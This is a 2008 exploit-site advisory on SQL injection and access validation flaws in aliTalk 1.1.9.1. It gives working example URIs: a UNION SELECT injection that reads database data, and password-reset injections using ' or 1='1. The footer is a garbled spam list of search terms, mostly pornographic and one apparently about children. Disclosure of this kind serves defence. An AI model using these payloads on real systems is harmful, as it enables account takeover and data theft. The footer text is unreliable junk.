about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , aliTalk Multiple SQL Injection And Access Validation Vulnerabilties


Title aliTalk Multiple SQL Injection And Access Validation Vulnerabilties
Published 2008-01-16-12:00AM
Updated 2008-01-16-09:58PM
Class Unknown
CVE  
Remote  Yes
Local  No
Credit  tomplixsee is credited with the discovery of these issues.
Vulnerable  AlilG aliTalk 1.1.9 .1
Not Vulnerable  
Code  Attackers can exploit these issues using a browser.The following example URIs are avaialble:http://www.example.com/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400
http://www.example.com/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=hacker
http://www.example.com/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=hacker
http://www.example.com/inc/elementz.php?lilil=400&ubild=hacker&pa=hacker
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 19:54:07 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Purnima Www.sex na 200 /compo www.sunzar usasexguid Www.Sexyve phpbbfm news for c sexypictur webkinz ha Www.ayuazh clipe do c image Sreyasex WWW.udayab Dvd4arab.c Hot mallus www.sexi.v Sexgirlpic www.mikesa Sex.india. www.srilan com_phpsho Sexs.com kernel 2.4 Sreyasex www.18soon Sax video www.sexi.v WWW.aunti www.18soon PtPP www.sex.tv www.srilan mysql 5 /search/ex vuln/explo allinurl: sex chaild %2Fsearch% XXLmagazin Www.Ultrap wwwzoo-sex openSSH 3. www. acces Sexvideo c nudeimage jenfer lop www.xvidoe maria shar